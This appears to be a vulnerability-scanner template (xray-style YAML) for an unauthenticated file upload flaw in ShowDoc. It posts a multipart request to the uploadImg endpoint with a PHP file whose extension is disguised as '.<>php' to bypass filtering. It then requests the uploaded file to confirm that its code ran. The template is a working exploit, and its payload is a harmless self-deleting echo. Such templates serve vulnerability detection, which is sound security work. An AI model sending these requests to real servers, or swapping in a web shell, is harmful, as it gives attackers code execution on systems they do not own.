id: showdoc-uploadfile

info:
    name: Showdoc Uploadfile
    author: White(https://github.com/WhiteHSBG)
    severity: high
    verified: true

set:
    r1: randomLowercase(4)
    r2: md5(r1)
    rboundary: randomLowercase(8)
rules:
    r0:
        request:
            method: POST
            path: /index.php?s=/home/page/uploadImg
            headers:
                Content-Type: multipart/form-data; boundary=--------------------------WebKitFormBoundary{{rboundary}}
            body: "\
                ----------------------------WebKitFormBoundary{{rboundary}}\r\n\
                Content-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\r\n\
                Content-Type: text/plain\r\n\
                \r\n\
                <?php echo \"{{r2}}\"; unlink(__FILE__); ?>\r\n\
                ----------------------------WebKitFormBoundary{{rboundary}}--\r\n\
                "
        expression: response.status == 200 && response.body.bcontains(b"success")
        output:
            search: '"(?P<date>\\d{4}-\\d{2}-\\d{2})\\\\/(?P<file>[a-f0-9]+\\.php)".bsubmatch(response.body)'
            date: search["date"]
            file: search["file"]
    r1:
        request:
            method: GET
            path: /Public/Uploads/{{date}}/{{file}}
        expression: response.status == 200 && response.body.bcontains(bytes(r2))
expression: r0() && r1()

